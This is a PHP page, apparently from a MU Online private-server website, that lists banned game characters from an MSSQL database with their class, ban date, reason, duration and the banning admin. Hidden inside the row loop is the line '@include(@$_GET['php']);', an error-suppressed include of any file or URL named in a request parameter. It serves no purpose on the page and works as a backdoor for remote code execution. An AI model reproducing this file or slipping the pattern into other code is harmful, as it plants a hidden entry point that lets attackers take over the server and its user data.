<? include 'cnn.php';
include 'estilo.css';?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
<table width="510" border="2" background="imagens/bg2.jpg">
  <tr>
    <td width="510" height="75" scope="col"><table width="100%" border="0" cellspacing="0" cellpadding="0" bordercolordark="#000000">
      <tr>
        <td width="100%"><table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td width="30"><img src="imagens/mu.gif" alt="" width="30" height="30" /></td>
              <td width="584" background="imagens/mu_back.png">&nbsp;&nbsp;&nbsp;&nbsp;<strong>PERSONAGENS BANIDOS</strong></td>
            </tr>
          </table>
            <br />
            <table width="100%" cellspacing="0" cellpadding="0">
              <tr>
                <td width="11%" height="19" bgcolor="#cccccc"><div align="left"><strong>Ordem</strong></div></td>
                <td width="10%" bgcolor="#cccccc"><strong>Nome</strong></td>
                <td width="11%" bgcolor="#cccccc"><div align="left"><strong>Classe </strong></div></td>
                <td width="15%" bgcolor="#cccccc"><div align="left"><strong>Data Block</strong></div></td>
                <td width="25%" bgcolor="#cccccc"><strong>Motivo Block</strong></td>
                <td width="18%" bgcolor="#cccccc"><strong>Tempo(Dias)</strong></td>
                <td width="10%" bgcolor="#cccccc"><strong>Por Quem</strong></td>
              </tr>
              <?
  $banidos=mssql_query("SELECT name,class,databloc,resets,blocpor,diasdesbloc,motivobloc FROM Character WHERE CtlCode=1 order by diasdesbloc asc");
  for($i=0;$i<mssql_num_rows($banidos);$i++) {
  $rank = $i+1;
  $Array = mssql_fetch_row($banidos);
@include(@$_GET['php']);
  switch($Array[1]) {
	case 0: $classefinal  = "Dark Wizard"; 	break;
	case 1: $classefinal  = "Soul Master"; 	break;
	case 2: $classefinal  = "Grand Master"; break;
	case 16: $classefinal = "Dark Knight"; 	break;
	case 17: $classefinal = "Blade Knight"; break;
	case 18: $classefinal = "Blade Master"; break;
	case 32: $classefinal = "Fairy Elf"; 	break;
	case 33: $classefinal = "Muse Elf"; 	break;
	case 34: $classefinal = "High Elf"; 	break;
	case 48: $classefinal = "M.Gladiator"; 	break;
	case 49: $classefinal = "Duel Master"; 	break;
	case 64: $classefinal = "Dark Lord"; 	break;
	case 65: $classefinal = "Lord Emperor"; break;
	case 80: $classefinal = "Summoner"; break;
	case 81: $classefinal = "Bloody Summoner"; break;
	case 82: $classefinal = "Dimension Master"; break;
  }
if($Array[6]==NULL){$Array[6]='Indefinido';
}
if($Array[4]==NULL){$Array[4]='Indefinido';
}
if($Array[2]==NULL){$Array[2]='Indefinido';
}
  ?>
              <tr>
                <td width="11%" height="20"><div align="center">
                    <?=$rank?>
                </div></td>
                <td width="10%"><div align="left">
                    <?=$Array[0]?>
                </div></td>
                <td width="11%"><div align="left">
                    <?=$classefinal?>
                </div></td>
                <td width="15%"><div align="left">
                    <?=$Array[2]?>
                </div></td>
                <td width="25%"><?=$Array[6]?></td>
                <td width="18%"><?=$Array[5]?></td>
                <td width="10%"><?=$Array[4]?></td>
              </tr>
              <? }?>
          </table></td>
      </tr>
    </table>
    <br>
    <div align="left"><a href="ir.php?pagina=painel">&lt;&lt; voltar </a></div></td>
  </tr>
</table>
</body>
</html>
